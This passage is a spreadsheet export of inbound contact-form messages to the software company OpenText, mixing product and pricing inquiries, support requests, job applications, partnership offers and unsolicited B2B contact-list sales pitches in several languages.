We are B2B contacts provider. We have complete contact details  of:_x000D_
_x000D_
• Utility executives, VPs, directors, business units professionals, key enterprise users, partners, analysts_x000D_
• Engineering including planning, design, systems_x000D_
• Engineering management/supervisor_x000D_
• IT systems/services_x000D_
• Operations and maintenance_x000D_
• Operations management/supervisor_x000D_
• Purchasing_x000D_
• Research and development_x000D_
_x000D_
Including: Power generation, Transmission, Distribution, Retail, Gas, Water, Waste, Recycling and more. _x000D_
_x000D_
Kindly revert back with the specific Industry/Geography/Job titles you want to target, I will send you few samples, counts and pricing for your reference._x000D_
_x000D_
I’m looking forward to working with you._x000D_
_x000D_
Regards,_x000D_
Diana Anderson</t>
  </si>
  <si>
    <t>Can you please provide the Export Control Classification Number (ECCN) per the Commerce Control List (CCL) for:_x000D_
Exceed X Server for Windows (v14); and_x000D_
Exceed XDK (v14)._x000D_
Thank you.</t>
  </si>
  <si>
    <t>We are interested in becoming resellers of the redlining /commenting software, as we are in the process of developing an application for distributing documents for online review. please provide more detail regarding pricing models? (Quite urgent)</t>
  </si>
  <si>
    <t>I am interested in OpenText MBPM because i need a .NET solution and can not run Java.  What is the overall plan for the long term life of this MBPM solution?  Will it be supported long term?</t>
  </si>
  <si>
    <t>I received a letter regarding the upgrade to your ERP system, however I am new to this position and am not familiar with your company. It seems like we may have an account with you but I'm not sure about that. Can someone please verify if we have an account and who the contact person would be?_x000D_
_x000D_
Thank you,_x000D_
Christina Lozano, Marketing Director_x000D_
AFFCU</t>
  </si>
  <si>
    <t>Im interested to work in Open Text. Suggest me the ways so that i can be a part in your organization</t>
  </si>
  <si>
    <t>Softron is an IT company with offices in Argentina and Uruguay. We are interested in becoming your partner, and we have an opportunity we would like to pursue right away. Please contact me.</t>
  </si>
  <si>
    <t>Questions about products (sales/technical) - particularly interested in Design Files support (AutoCAD, Microstation, etc.) and files storage/replication capabilities (multiple locations)</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for an ECMS that will allow my org to write, edit, and publish policy and procedure manuals in real time for our on-line users.  Can OpenText provide the following minimum features:_x000D_
•	Self-Publishing Capability_x000D_
•	Version Control_x000D_
•	Workflow for content approval and publication_x000D_
•	Better search functionality (relational)_x000D_
•	Video Capability_x000D_
•	Archive Function_x000D_
•	Contractor support (manpower, help desk, training)_x000D_
•	Must be compatible with SharePoint On-Line_x000D_
•	Will eventually need to integrate into the PBGC IT network_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">necesitamos una demo de OpenText Content Suite Platform para realizar una investigación. </t>
  </si>
  <si>
    <t>We are pitching Exstream as a replacement for Documerge. Client already has Documaker and is planning to go that route but is also interested in Exstream. Need a comparison story and why Exstream is better than Documaker.</t>
  </si>
  <si>
    <t>I cannot access my support portal. The email keeps triggering confirmation email but nothing happens after that when I try to access my support portal. Please arrange the access ASAP</t>
  </si>
  <si>
    <t>We are trying to get a quote for the cost of using GXS/Open Text as an ordering platform for use with the retailer Boscov's.  Can you please provide us with what the cost is for their vendors to integrate?  _x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I work for Govplace,  a Firstsource II contract holder, and I would like to request a price quotation for Captiva licenses.  If I could be directed to a distributor or sales representative that would be able to do so, I would greatly appreciate it._x000D_
_x000D_
Thank you,_x000D_
Alec Williams _x000D_
5714097706</t>
  </si>
  <si>
    <t>Gonzaga University is sending out an RFP for a Content Services Platform / Enterprise Content Management System. I need to have the contact information of who I should send the RFP to in your company.</t>
  </si>
  <si>
    <t>I would like to send you some examples of forms we use to evaluate trainings. Some of them are filled offline on printed paper. We would like to see whether your software could help us in scanning the information in machine-readable formats (like json or csv) to help us in aggregating the data.._x000D_
Looking forward to hearing from you!_x000D_
_x000D_
Kind regards, Federica Marra</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Dans le cadre d’une étude de marché de l’équipe Technology, Strategy &amp; Architecture de Deloitte France sur les outils d’ECM, je vous contacte afin d’obtenir plus d’informations sur votre outil Content Suite. Afin de recueillir les informations nécessaire à cette étude qui nous sera utile par la suite pour aider nos clients dans le choix d’outil dédié à l’ECM, je souhaiterais vous envoyer un formulaire à remplir. Pourriez-vous me fournir le mail d’une personne qui pourrait remplir ce formulaire ?_x000D_
De plus, j’aurais voulu savoir s’il était possible d’obtenir une version d’essai._x000D_
_x000D_
Bien cordialement,_x000D_
_x000D_
_x000D_
Hortense Maigne_x000D_
Stagiaire | Deloitte Conseil | Technology Advisory _x000D_
185, avenue Charles-de-Gaulle, 92200 Neuilly-sur-Seine_x000D_
Tel: +33 (0)6 32 13 92 26_x000D_
hmaigne@deloitte.fr | www.deloitte.fr_x000D_
</t>
  </si>
  <si>
    <t>We need the open text hostexplorer 14 x64 disk. We had a power failure and the UPS quit. We have only an empty  open text hostexplorer 14 x64 case. Do you have a download? UPC on case has Single HostExplorer 14 1310239</t>
  </si>
  <si>
    <t>Requesting eval of Exceed 3D to test on virtual machines.  We are running Exceed 15.01 x64.  We evaluated on physical machine which was very positive but management also wants to see if helpful on most of our systems, which are VMs.</t>
  </si>
  <si>
    <t xml:space="preserve">Optimum Group is selecting a solution for customer communications management, and we need information about your solution (Exstream) to determine if it fulfills our requirements._x000D_
_x000D_
If you are interested, please provide us with an email address to submit our RFI documents._x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Support Contract query._x000D_
We have had support and we believe we have paid for a support contract for eDOCS and Livelink. I am unable to access the support website because I get a "No Access_x000D_
_x000D_
_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource."_x000D_
Can you confirm that Logica/CGI has an active support contract?_x000D_
Regards,_x000D_
Hugh Patrick_x000D_
</t>
  </si>
  <si>
    <t>Need an official Letter from OpenText verifying list of available partners in the UAE region.</t>
  </si>
  <si>
    <t>Career Opportunity at OpenText, under the field of SAP ABAP</t>
  </si>
  <si>
    <t>To whom it concerns_x000D_
_x000D_
It has just come to my attention that a lady called Tracey J Carr _x000D_
 her business is known at the moment as MiPurpose and is based in the UK is / or has approached OpenText and is advertising the fact she is partnering with you in some form. However, if this partnership involves her software can I bring this important point to your attention  - she does not own all of the intellectual property of this software. Most of the functionality IP belongs to myself. There are outstanding monies for licence ship going back to 2013 and has been advised on numerous occasions not to use / promote or sell the software. The software its self was an asset of a company called IPFC / MyBestYearEver, this company was wound up by the investors back in 2015. She then illegally took the asset from this company to her new company  MiPurpose. This company is in the process of being wound up in the UK also, with the next hearing due to be in December 2017. She has also been investigated twice for fraud, once for theft and has previous experience of running insolvent companies._x000D_
I write this to urge to you have caution when dealing with Ms Carr and to do your due diligence on her._x000D_
_x000D_
If you have any further queries, please do not hesitate to contact me._x000D_
_x000D_
Regards_x000D_
_x000D_
David Noble</t>
  </si>
  <si>
    <t>Prices for Documentum 7.3 and information (possible purchase)</t>
  </si>
  <si>
    <t>Basic Documentum Quote</t>
  </si>
  <si>
    <t>We are one of the leading Staffing &amp; Recruitment firm from Belgaum. Karnataka. We can provide entry level candidates also for your Hyderabad Region.</t>
  </si>
  <si>
    <t>Dear OpenText,_x000D_
Good day! _x000D_
I would like to give constructive feedback about your Recruitment Team in Manila._x000D_
I find Ms. Lorenz Mutia of your Talent Acquisition Team very unprofessional._x000D_
She scheduled me for an interview at 1pm today and she arrived office at 1:22pm._x000D_
She did not inform that she would be late. I contacted her to ask but she did not reply._x000D_
She made me wait longer. I decided to forego the interview and left 1:35pm._x000D_
This is a poor reflection of professionalism in your company._x000D_
I hope your interviewers would also respect the time of your interviewees._x000D_
I have screenshots of the message thread and would gladly share it with you should you need documentation._x000D_
Thank you for your time._x000D_
Sincerely,_x000D_
Christine Mallion</t>
  </si>
  <si>
    <t>To get license for Bi Query version 10.1.2</t>
  </si>
  <si>
    <t>Hi I contacted yesterday regarding our requirement for inline viewer. Can I please get an update for same?</t>
  </si>
  <si>
    <t>We would like to request a trail copy of OpenText Capture Center. We're looking for automated document classification and data extraction solution to be used internally. Volume is about 20 million pages of document/images per year. We also like to know our licensing options. Thanks!</t>
  </si>
  <si>
    <t>I have Team Developer 6.3 which I bought from Gupta Technologies before OpenText took over. I often need to look an old web page of Gupta, I can not find anything on the new web page. I need to check if there is any  version Updates or bug fix about Team Developer 6.3. Do you have download link as it was before.  Regards  Mehmet Civisilli</t>
  </si>
  <si>
    <t>We look forward to associate with opentext._x000D_
Regards,_x000D_
www.perfectprofile.net</t>
  </si>
  <si>
    <t>Wish to become a vendor to your company. We will be at Outdoor Retailer Show in late July in Salt Lake City.</t>
  </si>
  <si>
    <t xml:space="preserve">Optin Contacts Inc, is amongst leading market specialists in delivering Sales leads, email/data appending, application development and online marketing solutions. We are a quality data service provider. All the lists are dual verified and contain permission based opt-in contacts, so that it accomplishes your specific requirements. _x000D_
_x000D_
Our list are sourced through various sources. The data is obtained by our affiliates who visit trade shows, conference to collect name card and send it back to us. Which will be confirmed and converted into opt-in by our tele-verification team._x000D_
_x000D_
In case of International list based on specialty it is obtained by our affiliates by direct visits, advanced screening process to validate the existence of those contacts, follow ups and also have the list updated if there are any changes. By using our permission based records you will have 20% to 30% increase in conversion rate than any other list vendor in market, which in turn will increase your ROI(Return On Investment)._x000D_
_x000D_
These list can be used for your marketing events such as email marketing campaign, direct marketing, event marketing, promoting your products, webinars, market research, to study the market trends, to acquire access to international market and also for networking and increasing your business resource. We also keep the market reports of the company’s growth which helps our client to target the right industry sector._x000D_
_x000D_
If you are interested in using our services please send me your target criteria &amp; geographic area, so that I can send you some samples, which will be at zero cost._x000D_
 _x000D_
Target Industry     :  ________________________________ (Any Industry - We have it all)_x000D_
Target Geography :  ________________________________ (Any Country)_x000D_
Target Job Title      :  ________________________________ (CEO, CFO, CTO, VP/Director, Etc)._x000D_
               _x000D_
Please let me know of a convenient time for a quick call to discuss opportunities. </t>
  </si>
  <si>
    <t xml:space="preserve">Need to migrate teleform system to new server and also swap out desktop and transfer licenses.  We are using version 10.7 </t>
  </si>
  <si>
    <t xml:space="preserve">Need to discuss FOIP/ Fax Server solutions for high volume Electronig Faxing. </t>
  </si>
  <si>
    <t>Hi......i need some help with the catalog.  I sent an 832 and got several errors that I'm not sure how to correct.  Our account is 129167264413.  I didn't see any contact option on the catalog screen anywhere.  _x000D_
_x000D_
Thanks,_x000D_
Renee</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am reaching out to check whether you have any need of key decision makers from various Business intelligence software users mentioned below:_x000D_
 _x000D_
We are B2B contact providers. We have complete list of: CIOs, Business Directors and Managers, IT Directors, Business Intelligence Managers, Decision Support Managers, Data Warehouse Managers, Systems Integrators, Senior Project Managers, BI Architects / Designers / Developers, Data Architects / Modelers / Designers / Developers, Data Analysts and Business Analysts..._x000D_
_x000D_
Let me know the specific Industry/Geography/Job titles you want to target, I will send you few samples, counts and pricing for your reference._x000D_
 _x000D_
I’m looking forward to working with you._x000D_
 _x000D_
Regards,_x000D_
Diana Anderson | Marketing Manager</t>
  </si>
  <si>
    <t xml:space="preserve">Please provide a email address to request a quote._x000D_
_x000D_
Thank you!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for KB on CIDM product. Migration project to GCDOCS has yieleded issues with CIDM. Please provide KB for CIDM procuct or link to KB including access. </t>
  </si>
  <si>
    <t xml:space="preserve">My name is Brian Lusenhop and I am the new IT Manager here at Drew Shoe.  Previously, Carl Brooke, was our Analyst assigned to the GXS catalogue but he is no longer with the company as of July 10th.  Due to his departure we no longer have access to our Account and I am requesting access to make modifications to the catalogue.  _x000D_
_x000D_
I have previously emailed cataloguesupport@opentext.com and I have not received a response.  My service request is 1-2986005141 and our clients are expecting updates to the catalogue and I'd like to try to fulfill them as soon as possible._x000D_
_x000D_
I am not certain of our Network ID, Username and Password.  If you could please contact me regarding this that would be appreciated.  Let me know if there is further information you need from me._x000D_
</t>
  </si>
  <si>
    <t>Cooperation proposal. _x000D_
_x000D_
Hello, I have been dealing with e-Estonian secure, universal, deistributed and official data and documents exchange in Estonia since 2002 and since 2013 I started to help Finnish government to implement the same technology. Last year we built up the same solution for global usage. So we see that we can cooperate and provide a secure P2P solution between opentext installations and between other platform users to integrate business processes between different legal entities and their systems. If you are interested to go on into details, please let us know. You can read more from our web roksnet.com._x000D_
_x000D_
Best Regards,_x000D_
riho</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Our organisation is currently reviewing digital asset management systems and we are ready to start our initial vendor review process. _x000D_
_x000D_
Our rough time line for this process is:_x000D_
Initial demo and Q&amp;A - July 24-July 29_x000D_
Short list of Vendors - by August 5_x000D_
Final Demos - August 7-12_x000D_
RFP Initiated - August 14_x000D_
RFP Reply due by - August 26_x000D_
Contract Negotiation and Final Vendor Selection - September_x000D_
Key Deadline: Invoice for 1 year license before September 30_x000D_
_x000D_
With this, I'd like to schedule a virtual demo with your team for this coming week so we can get some initial questions answered. Do you have availability between 8:00 am and 3:00 pm EST for this before July 29?_x000D_
_x000D_
Many thanks,_x000D_
Amy Davey</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiries about Captiva - Invoice Capture </t>
  </si>
  <si>
    <t>Brava question in regards to default calibration.</t>
  </si>
  <si>
    <t xml:space="preserve">Request for pricing on 210 Annual Open Text Exceed Software Maintenance MAINT-EXMPI550700M License # V092652-000 Period of Performance 09/01/2017-08/31/2018 Base + 4 Option _x000D_
 years </t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for software to be compliant with Title 21 CFR 11. We need to track electronic signature for SOPs and Trainings for our new pharmaceutical training. </t>
  </si>
  <si>
    <t>I need the JS Api for Birt. How much?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Hope you're doing great!_x000D_
_x000D_
Respecting your time, I would keep this short, I am writing in as you appear to be an appropriate person to connect with or might at least point me in the right direction._x000D_
_x000D_
I am sure you would be well aware of email marketing and the use of email database. _x000D_
We provide business contacts from across the globe in any industry vertical within your target geography with any specific job title, revenue size, employee size, technology users, etc._x000D_
_x000D_
If this is something which you would plan for this quarter or the next, Let me know your interest so that I will get back to you with counts, pricing &amp; samples for the same._x000D_
_x000D_
Furthermore, we can validate and clean any of the marketing databases you may currently have in-house, and append additional contacts or company information that can both save you valuable time and increase your sales._x000D_
_x000D_
Thanks and looking forward to helping you with your marketing needs._x000D_
_x000D_
Regards,_x000D_
Ethan Morris | Marketing Manager</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
Hi, my name is Ronnie from CDYNE.  We are a tier one SMS and Voice broadcast provider.  I noticed OPENTEXT is using Shared Short Code 30939 for your messaging needs.  To keep it short I am positive we can save you money, with a faster more reliable service.  Our API’s can be seamlessly integrated into your system. _x000D_
_x000D_
  I would be like to have a short phone call to discuss pricing and how CDYNE can improve your overall messaging experience.  If you would prefer I can email you with pricing.  I just need an estimated monthly message volume to give you the most accurate pricing possible.  Looking forward to hearing from you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Interested in pricing information and a demo of eDOCS DM for the company's legal department.</t>
  </si>
  <si>
    <t xml:space="preserve">I have an RFQ for several of your products. I can send it over if I have a point of contact email._x000D_
</t>
  </si>
  <si>
    <t>AutoNation has been engaged with OpenText in the past and the former contacts are no longer with OpenText.  I would like to start a dialog regarding content management as well as BPM solutions.</t>
  </si>
  <si>
    <t>To stop fax calls_x000D_
New fax number 787-737-5441</t>
  </si>
  <si>
    <t>you fucking idiots !!!!!</t>
  </si>
  <si>
    <t>This is regarding the training course  S-3710 OpenText Communication Center Enterprise Fundamentals v16._x000D_
_x000D_
I am planning to attend the same._x000D_
_x000D_
Kindly provide the details for the same.</t>
  </si>
  <si>
    <t>Need information on Fax server options</t>
  </si>
  <si>
    <t xml:space="preserve">How are you doing? _x000D_
_x000D_
My name is Zach from CDYNE. We are a tier one SMS and Voice broadcast provider. I noticed that Open Text uses the dedicated short code 30939 for your messaging needs. I’m not sure who your current provider is, but I am positive that we can continue to provide this solution for you seamlessly with more reliable service at a better price. _x000D_
_x000D_
Depending on volume, I can offer you a rate as low as $0.0015/SMS plus passthrough fees._x000D_
_x000D_
I would be interested in having a short phone call to discuss pricing and how CDYNE can improve your overall messaging experience. If you would prefer I can email you with pricing. I just need an estimated monthly message volume to give you the most accurate pricing. _x000D_
_x000D_
Looking forward to hearing from you._x000D_
_x000D_
_x000D_
Best,_x000D_
_x000D_
Zach Van Way_x000D_
Sales Manager_x000D_
CDYNE Corporation_x000D_
757-544-9510 ext 3157 (main)_x000D_
757-553-4271 (cell)_x000D_
757-361-0018 (fax)_x000D_
www.cdyne.com_x000D_
_x000D_
Deloitte’s Technology Fast 500™ - #158 (2013) and #197 (2014)_x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Opentext Exstream training and design manager license</t>
  </si>
  <si>
    <t>Hello, I would be interested in knowing when the next convention in Toronto will be held. I understand it is in July 2018. I heard such good things about the past one (last week July 10-13) and want to make sure I have notice ahead of time to plan for the next one._x000D_
_x000D_
Regards,_x000D_
Marilyn A. Hurley</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I'm looking for a update of Cardiff Teleform. I presently have the version 7.1._x000D_
What is the price for a version on Windows 10 ?_x000D_
_x000D_
Thank's                                  </t>
  </si>
  <si>
    <t>Cannot access OpenText. I have received a confirmation email, and I keep getting a page that says "No Access" and "Almost there" when I click the My Support link. Then, I click the Request Confirmation Email link, and I have to repeat the steps again.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
I just had a quick question that I could not seem to find reference for in your documentation. I was wondering if eDOCS DM supports Microsoft DFS Replication and Namespaces for the back-end file storage? If not, what file availability services do you support?_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a HTML5 based web viewer like brava to show files in browser. Also with functionalities like DRM, annotation and security. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi - We have a client that would like to switch their Site Search from Google to another platform.  They currently host their documents in Documentum.  Is there some kind of sitemap or list we can pull from Documentum that lists out all the files/documents hosted in Documentum? </t>
  </si>
  <si>
    <t xml:space="preserve">OPENTEXT EXSTREAM Training and License._x000D_
Hi,_x000D_
I would like to know course details for '7600 OpenText Exstream - Introduction to Design' and the cost associated with to get a design manager license._x000D_
_x000D_
Thanks in advance for your prompt reply._x000D_
_x000D_
Ayan_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I want to purchase Brava Reader. I cant understand what I am buying or what is for sale here. Way too confusing. </t>
  </si>
  <si>
    <t>Hallo,_x000D_
ik wil graag de training "3-3710 OpenText StreamServe Fundamentals v5.6.2" asap volgen. De eerste mogelijkheid in NL is echter pas in december. Zijn er wellicht nog andere mogelijkhden op korte(re) termijn in NL?_x000D_
Hoor graag_x000D_
vriendelijk bedankt, Martin Haas</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am contacting you because I missed one urgent booking pdf in our content server and was wondering if it could be sent to my email which I stated above. The file is located in a folder called TOURISTIKcom Porec. In that file there is a collection of PDF's called "Urgent-Bookings_0512.pdf" and I missed to download the 1390 version of that pdf. If you could please send that file to my e-mail or make it visible in the content server it would be much appreciated._x000D_
_x000D_
Thank you in advance, Borna Dobrović</t>
  </si>
  <si>
    <t>I want to add Sanlam resources to this account but it seems that I cannot do that. Please advise how to proceed. Thank you</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm from a consultant company that is searching for a document management solution for a law firm._x000D_
I would like to have more information about the the price of licensing the OpenText™ eDOCS Applications for Law Firms._x000D_
Best Regards,_x000D_
Diogo Fortes</t>
  </si>
  <si>
    <t>Looking for an opportunity to collaborate for optimized Recruitment/Staff Augmentation &amp; implementing best business processes for sustainable and scalable growth.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
 _x000D_
Je suis en charge d’une étude de l’éditique pour un établissement publique._x000D_
J’ai quelques questions par rapport à votre produit._x000D_
 _x000D_
est que vous pouvez me donner la fréquence de publication de patchs correctifs et nouvelles versions du produit :_x000D_
Le prix de mise en place et d’exploitation :_x000D_
Les technologies utilisées pour votre produit :_x000D_
Par rapport au mode d’acquisition :_x000D_
-             UGAP (Oui/Non) : _x000D_
-             direction des achats (Oui/Non) :_x000D_
-             groupement des achats inter-agences (Oui/Non) :_x000D_
-             appel d’offre (Oui/Non) :_x000D_
 _x000D_
Merci d’avance_x000D_
Cordialement,_x000D_
 _x000D_
Olivier CHAMPAGNAT.</t>
  </si>
  <si>
    <t>Request the access to knowledge center, as the OpenText Partner.</t>
  </si>
  <si>
    <t>address change: Barbizonlaan 87 2908 ME Capelle aan den IJssel Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
 _x000D_
I would like to ask you about the following course: OpenText Vendor Invoice Management (VIM) for SAP in UK. We would like to arrange the training for 3-7 people from 3M company. EduBroker acts as an outsourcing company for 3M Global Service Center, and registers employees and processes payments on behalf of the Client. Please note that sold to party is 3M GSC and bill to party is EduBroker sp. z o.o._x000D_
 _x000D_
We would like to receive invoice on our name:_x000D_
EduBroker Sp. zo.o._x000D_
Górczewska 137_x000D_
01-459 Warszawa_x000D_
Poland_x000D_
EU VAT registration number: PL5272572670_x000D_
 _x000D_
I would like to know if it’s possible to arrange registration via e-mail. Regarding payment, we would highly appreciate a possibility of payment after the training (30 days preferably). Please also confirm if we can receive an invoice with 0% VAT rate (and if you include VAT, what will be the rate). After I receive reply we will proceed with the registration._x000D_
Thank you in advance for your help._x000D_
 _x000D_
Kind regards,_x000D_
Agnieszka Bałdyga_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>searching for job on java profile with 1.5 years</t>
  </si>
  <si>
    <t>Hi There,_x000D_
_x000D_
We are working on a web based application which has some functionality of inline viewer._x000D_
Requirement is like we need some custom inline viewer which can support given file formats._x000D_
PDF, TIFF, JPEG, AI, MP3, MP4, AVI, Microsoft Office Word Documents etc._x000D_
_x000D_
What we are looking is mostly is customization over viewer controls._x000D_
_x000D_
We are using Documentum xCP based development environment which made me shortlist Brava for same._x000D_
_x000D_
I would like to know the pricing and subscription details for two of your products to proceed further with my analysis._x000D_
OpenText™ Brava!™ for Documentum xCP_x000D_
OpenText™ Brava!™ Enterprise Supported Formats_x000D_
_x000D_
Please revert me back as soon as possible._x000D_
_x000D_
Thanks,_x000D_
Chirag</t>
  </si>
  <si>
    <t xml:space="preserve">I need a contact for HP Output Management to support one of our partners. </t>
  </si>
  <si>
    <t>Need the user license price of Documentum xCP 2.3 for a client in Japan</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Hope you're doing great!_x000D_
_x000D_
Respecting your time, I would keep this short, I am writing in as you appear to be an appropriate person to connect with or might at least point me in the right direction._x000D_
_x000D_
I am sure you would be well aware of email marketing and the use of email database. _x000D_
We provide business contacts from across the globe in any industry vertical within your target geography with any specific job title, revenue size, employee size, technology users, etc._x000D_
_x000D_
If this is something which you would plan for this quarter or the next, Let me know your interest so that I will get back to you with counts, pricing &amp; samples for the same._x000D_
_x000D_
Furthermore, we can validate and clean any of the marketing databases you may currently have in-house, and append additional contacts or company information that can both save you valuable time and increase your sales._x000D_
_x000D_
Thanks and looking forward to helping you with your marketing needs._x000D_
_x000D_
Regards,_x000D_
Peter Thomas | Marketing Manager_x000D_
Sublime Data Inc._x000D_
peter@sublimedata.us_x000D_
www.sublimedata.us</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I need help with our current Application Extender program.  I am wondering if an update or newer version is available.  </t>
  </si>
  <si>
    <t>Looking for an email system to use on our training ship which ships out annually.  Heard that SUNY Maritime is using First Class on their training ship and they said it meets their needs.  We have outgrown the system we are using now.  Thank you!</t>
  </si>
  <si>
    <t>Gostaria de saber mais sobre a OpenText para possível utilização da solução para projeto interno. Existe algum e-mail o qual posso mandar as informações que desejo saber?_x000D_
Obrigada.</t>
  </si>
  <si>
    <t>PLEASE VERIFY THE CORRECT BANK DETAILS TO USE TO PROCESS INVOICE SCH08122235 MANY THANKS</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Greeting from Tina._x000D_
_x000D_
Would you be interested in using our newly updated opt-in database which can help you to reach Digital Transaction Technology Professional Contact List across USA,UK and Australia. I would be more than happy to help you with Email Marketing / Campaign._x000D_
_x000D_
Buyers List_x000D_
_x000D_
Bank Heads, Managing Directors, SVPs from the following divisions:_x000D_
•	Transaction Banking_x000D_
•	Corporate Strategy_x000D_
•	Client Management_x000D_
•	Digital Banking Manager_x000D_
•	Programme Managers_x000D_
•	Director of Transactional Banking Department_x000D_
•	Digital Business Development_x000D_
•	Head of Wholesale Internet Solutions_x000D_
•	Head Branchless &amp; eBanking_x000D_
•	Global Head of Digital Commerce_x000D_
•	Managing Director - Global Head-Online Banking and Connectivity Services_x000D_
•	Head of Corporate &amp; Investment Banking_x000D_
_x000D_
Every Contact Includes : Contact Name, Titles, Company Name, Address, City, State, Contact Number, Website, Employee Size, Revenue Size, Industry Vertical, NAICS, Permission Based Email Address etc. in Excel Format for your ownership with unlimited usage._x000D_
 _x000D_
Please let me know if you are interested in Target Market (Region/Titles) and I would be happy to get back with Data Counts and Costs. I appreciate your time and look forward to hearing from you soon._x000D_
  _x000D_
Warm Regards,_x000D_
Tina Lousie_x000D_
B2B | E-mail and Data Appending Services| USA/UK_x000D_
5623-A Woods Mill Road| Gainesville, GA 30501 |United States_x000D_
E-mail: tina.lousie@outlook.com_x000D_
_________________________________________x000D_
 If you're not interested please reply subject line as "Leave Out”._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
We are a third party company working on behalf of USAA Federal Savings Bank  to verify employment for an individual at Opentext Exstream. Can you please advise how we can go about obtaining the employment verification? If you prefer to call, please call 855-550-6772 and reference #ORDER ID 15875770. This information is time sensitive, so your prompt response is appreciated._x000D_
_x000D_
Thank you,_x000D_
</t>
  </si>
  <si>
    <t>Would like costing information and to set up a demo with a sales rep for products in the Legal suite._x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">How can i get TO Exstream certification &amp; What's cost of it.. </t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Nous aimerions être recontactés par vos équipes commerciales dans le cadre du projet de dématérialisation de nos factures fournisseurs que nous venons de lancer._x000D_
_x000D_
Cordialement._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are trying to integrate with mediaBin inside our customer's site and are having a few issues. Whilst I am sure there are issues in the access we have to the application (via the customer's very strict firewalls etc.) I do wonder if you might help us to get/understand the API issues we are having - particularly in downloading assets._x000D_
_x000D_
It's all pretty woolly, I know, but I have to break the log-jam between us (Adgistics and the customer)._x000D_
_x000D_
Thanks for any help you can give us._x000D_
_x000D_
Chris Bunnett_x000D_
 </t>
  </si>
  <si>
    <t>Looking fr job change</t>
  </si>
  <si>
    <t>Adding new upc prefix to our catalog account</t>
  </si>
  <si>
    <t xml:space="preserve">Why is no one is sales answering? </t>
  </si>
  <si>
    <t xml:space="preserve">RightFax Server Module service did not restart automatically.  It appears that the ESQL-SERV server was experiencing high CPU utilization during the time that Rightfax was experiencing issues connecting to the database. We run full McAfee virus scans on the servers the second Saturday of each month and this process usually generates a lot of CPU spikes. What I am unsure of is why the process didn’t restart once it reconnected to the database, as the service is set to restart on failures. _x000D_
</t>
  </si>
  <si>
    <t>I would like to get the software or instructions in order to set this up._x000D_
our SUID 05221-12212</t>
  </si>
  <si>
    <t xml:space="preserve">my last name has changed from Murray to Solderich. I need to have my last name updated with you because I keep getting rejection notices as an unauthorized user. </t>
  </si>
  <si>
    <t>I want to know the exact cost for BIRT License _x000D_
whom to contact and how we can procure it.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for a X-Windows emulator tool for Windows 10 client with target servers on Solaris/AIX/Linux.   Exceed website only shows certification up to Windows 8._x000D_
</t>
  </si>
  <si>
    <t>We are currently looking into updating our content management platform to eliminate agent confusion, inefficiencies, and misinformation.  We are looking to create a consolidated knowledge base that hosts common information from multiple web platforms in one central location.  After reading about your Process Suite Platform and Web Content Management, I would like to discuss further with you all.  Please, reach out via email so I can bring the necessary stakeholders in to set up a meeting.</t>
  </si>
  <si>
    <t>Vacancy for job</t>
  </si>
  <si>
    <t>Background Screening.Contact Details.</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in integrating our Document Control Software with Brava SDK. Request you to please assign us to the Brava Team and oblige. </t>
  </si>
  <si>
    <t>We are working on the CCM space in the DX department in Infosys. We are looking forward to work with and collaborate with OpenText CCM solutions. This will help us in future proposals for our varied clients across geographies.</t>
  </si>
  <si>
    <t>We are in the business of development of ERP and selling it. We work on .Net platform, with Ms SQL Server. We want to integrate a BI/Analytics tool in our ERP, which can help us to design advanced Management Dashboard and Analytics for our clients, with flexibility for clients to make their own through simple drag-and-drop features. The software should be web-based, and multi-device, touch friendly. _x000D_
Please let us know about your solutions and pricing ASAP. Thanks.</t>
  </si>
  <si>
    <t>Inquiry about the BravaX Desktop 1.0 Type Library</t>
  </si>
  <si>
    <t xml:space="preserve">Technical Support - LiveLink 10 Client Installation </t>
  </si>
  <si>
    <t>Inital contact to broadly disuss Open Text Capture (OCR, Workflow, SharePoint Integration, digital signature/eSeal verifiation, costing model)</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
unser Unternehmen möchte eine unternehmensinterne Suche zum Auffinden von relevantem Wissen implementieren – ein Google für das eigene Unternehmen._x000D_
Dabei möchten wir unseren gesamten Datenbestand (ca. 2 Millionen Dokumente), der sich auf einem SharePoint (Microsoft 2010) befindet, in die Suche einbeziehen. Eine Suche zu fachspezifischen Themen der R&amp;D sollte genauso möglich sein, wie die Suche nach einer Vorlage für die Abrechnung der nächsten Dienstreise._x000D_
